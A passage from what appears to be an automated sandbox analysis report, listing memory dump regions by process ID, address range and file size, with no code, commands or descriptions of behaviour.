                                        • memory/1300-183-0x0000000000000000-mapping.dmp
                                        • memory/1300-215-0x000000001DC70000-0x000000001F202000-memory.dmp
                                          Filesize

                                          21.6MB

                                        • memory/1304-249-0x0000000000000000-mapping.dmp
                                        • memory/1312-202-0x000000001B7B0000-0x000000001B7B2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1312-184-0x0000000000000000-mapping.dmp
                                        • memory/1312-195-0x0000000001060000-0x0000000001061000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1312-194-0x0000000001040000-0x000000000105C000-memory.dmp
                                          Filesize

                                          112KB

                                        • memory/1312-193-0x0000000001030000-0x0000000001031000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1312-191-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1420-344-0x0000000000000000-mapping.dmp
                                        • memory/1528-335-0x0000000004C50000-0x0000000005256000-memory.dmp
                                          Filesize

                                          6.0MB

                                        • memory/1528-325-0x0000000000000000-mapping.dmp
                                        • memory/1676-421-0x0000000000000000-mapping.dmp
                                        • memory/1764-248-0x0000000000000000-mapping.dmp
                                        • memory/1820-293-0x0000000002DE0000-0x0000000002DEA000-memory.dmp
                                          Filesize

                                          40KB

                                        • memory/1820-274-0x0000000000000000-mapping.dmp
                                        • memory/1820-282-0x000000001E002000-0x000000001E003000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1820-285-0x0000000002D90000-0x0000000002D91000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/1820-286-0x00000000026F0000-0x00000000026F1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-153-0x0000000000000000-mapping.dmp
                                        • memory/2176-176-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-173-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-165-0x0000000005020000-0x0000000005021000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-167-0x0000000005040000-0x0000000005041000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-163-0x0000000005000000-0x0000000005001000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-177-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-174-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-164-0x0000000005010000-0x0000000005011000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-170-0x0000000005070000-0x0000000005071000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-172-0x0000000005090000-0x0000000005091000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-169-0x0000000005060000-0x0000000005061000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-168-0x0000000005050000-0x0000000005051000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-180-0x0000000005110000-0x0000000005111000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-161-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-175-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-157-0x0000000003930000-0x000000000396C000-memory.dmp
                                          Filesize

                                          240KB

                                        • memory/2176-179-0x0000000005100000-0x0000000005101000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-171-0x0000000005080000-0x0000000005081000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-178-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2176-166-0x0000000005030000-0x0000000005031000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2196-287-0x0000000000000000-mapping.dmp
                                        • memory/2196-299-0x0000000001900000-0x0000000001902000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/2356-210-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2356-208-0x0000000000680000-0x00000000006B0000-memory.dmp
                                          Filesize

                                          192KB

                                        • memory/2356-205-0x0000000000670000-0x0000000000671000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2356-199-0x0000000000150000-0x0000000000151000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2356-196-0x0000000000000000-mapping.dmp
                                        • memory/2356-217-0x000000001AE00000-0x000000001AE02000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/2572-365-0x0000019B65E00000-0x0000019B65E71000-memory.dmp
                                          Filesize

                                          452KB

                                        • memory/2632-252-0x0000000000000000-mapping.dmp
                                        • memory/2636-347-0x0000000000000000-mapping.dmp
                                        • memory/2636-209-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2636-214-0x0000000004330000-0x0000000004331000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2636-211-0x00000000042A0000-0x00000000042AC000-memory.dmp
                                          Filesize

                                          48KB

                                        • memory/2636-213-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2636-206-0x0000000000040000-0x0000000000041000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2636-201-0x0000000000000000-mapping.dmp
                                        • memory/2636-212-0x0000000009230000-0x0000000009231000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2660-499-0x0000000000000000-mapping.dmp
                                        • memory/3512-351-0x0000000000000000-mapping.dmp
                                        • memory/3556-303-0x0000000000150000-0x00000000001FE000-memory.dmp
                                          Filesize

                                          696KB

                                        • memory/3556-258-0x0000000000000000-mapping.dmp
                                        • memory/3640-368-0x00000000044A0000-0x00000000044FD000-memory.dmp
                                          Filesize

                                          372KB

                                        • memory/3640-363-0x0000000000E8F000-0x0000000000F90000-memory.dmp
                                          Filesize

                                          1.0MB

                                        • memory/3640-350-0x0000000000000000-mapping.dmp
                                        • memory/3700-279-0x0000000001080000-0x0000000001082000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/3700-272-0x00000000008D0000-0x00000000008D1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3700-269-0x0000000000000000-mapping.dmp
                                        • memory/3700-280-0x000000001C510000-0x000000001C512000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/3888-360-0x00007FF7A5304060-mapping.dmp
                                        • memory/3888-367-0x000002189E1B0000-0x000002189E221000-memory.dmp
                                          Filesize

                                          452KB

                                        • memory/3960-418-0x0000000000000000-mapping.dmp
                                        • memory/4028-158-0x0000000000400000-0x0000000000414000-memory.dmp
                                          Filesize

                                          80KB

                                        • memory/4028-148-0x0000000000000000-mapping.dmp
                                        • memory/4052-434-0x0000000000000000-mapping.dmp
                                        • memory/4212-503-0x0000000000000000-mapping.dmp
                                        • memory/4244-162-0x00000000023B4000-0x00000000023B6000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/4244-160-0x00000000023B2000-0x00000000023B4000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/4244-159-0x00000000023B0000-0x00000000023B2000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/4244-181-0x00000000023B6000-0x00000000023B8000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/4244-144-0x0000000000000000-mapping.dmp
                                        • memory/4244-147-0x00000000002B0000-0x00000000002B1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4308-304-0x0000000000630000-0x0000000000652000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/4308-312-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4308-314-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4308-313-0x0000000004A30000-0x0000000005036000-memory.dmp
                                          Filesize

                                          6.0MB

                                        • memory/4308-309-0x0000000005040000-0x0000000005041000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4308-310-0x0000000004A90000-0x0000000004A91000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4308-311-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4312-497-0x0000000000000000-mapping.dmp
                                        • memory/4424-283-0x0000000000000000-mapping.dmp
                                        • memory/4424-323-0x0000000000000000-mapping.dmp
                                        • memory/4432-247-0x0000000000000000-mapping.dmp
                                        • memory/4440-324-0x0000000000000000-mapping.dmp
                                        • memory/4540-239-0x0000000000000000-mapping.dmp
                                        • memory/4556-243-0x0000000000000000-mapping.dmp
                                        • memory/4580-322-0x000001DC5BA70000-0x000001DC5BA90000-memory.dmp
                                          Filesize

                                          128KB

                                        • memory/4580-302-0x000001DC5BA50000-0x000001DC5BA70000-memory.dmp
                                          Filesize

                                          128KB

                                        • memory/4580-294-0x0000000140000000-0x0000000140758000-memory.dmp
                                          Filesize

                                          7.3MB

                                        • memory/4580-297-0x0000000140000000-0x0000000140758000-memory.dmp
                                          Filesize

                                          7.3MB

                                        • memory/4580-296-0x000001DC5BA10000-0x000001DC5BA30000-memory.dmp
                                          Filesize

                                          128KB

                                        • memory/4580-295-0x00000001402EB66C-mapping.dmp
                                        • memory/4608-255-0x0000000000000000-mapping.dmp
                                        • memory/4624-501-0x0000000000000000-mapping.dmp
                                        • memory/4824-116-0x0000000000400000-0x0000000000414000-memory.dmp
                                          Filesize

                                          80KB

                                        • memory/4852-137-0x0000000003C90000-0x0000000003C91000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-128-0x0000000003C00000-0x0000000003C01000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-133-0x0000000003C50000-0x0000000003C51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-126-0x0000000005170000-0x0000000005171000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-123-0x0000000005140000-0x0000000005141000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-124-0x0000000005150000-0x0000000005151000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-122-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-134-0x0000000003C60000-0x0000000003C61000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-129-0x0000000003C10000-0x0000000003C11000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-135-0x0000000003C70000-0x0000000003C71000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-125-0x0000000005160000-0x0000000005161000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-136-0x0000000003C80000-0x0000000003C81000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-138-0x0000000003CA0000-0x0000000003CA1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-139-0x0000000003CB0000-0x0000000003CB1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-140-0x0000000003CC0000-0x0000000003CC1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-131-0x0000000003C30000-0x0000000003C31000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-117-0x0000000000000000-mapping.dmp
                                        • memory/4852-132-0x0000000003C40000-0x0000000003C41000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-127-0x0000000003BF0000-0x0000000003BF1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4852-130-0x0000000003C20000-0x0000000003C21000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4864-422-0x0000000000000000-mapping.dmp
                                        • memory/4868-505-0x0000000000000000-mapping.dmp
                                        • memory/4904-229-0x000000000A990000-0x000000000A9C7000-memory.dmp
                                          Filesize

                                          220KB

                                        • memory/4904-228-0x0000000001470000-0x0000000001471000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4904-263-0x0000000005D40000-0x0000000005D41000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4904-237-0x0000000005500000-0x0000000005501000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4904-218-0x0000000000000000-mapping.dmp
                                        • memory/4904-231-0x0000000002C90000-0x0000000002C91000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4904-244-0x0000000005680000-0x0000000005681000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4904-224-0x0000000000C90000-0x0000000000C91000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4924-236-0x0000000004F40000-0x0000000004F41000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/4924-220-0x0000000000000000-mapping.dmp
                                        • memory/4924-238-0x00000000027D0000-0x00000000027D1000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/5012-498-0x0000000000000000-mapping.dmp
                                        • memory/5036-141-0x0000000000000000-mapping.dmp
                                        • memory/5092-284-0x0000000000000000-mapping.dmp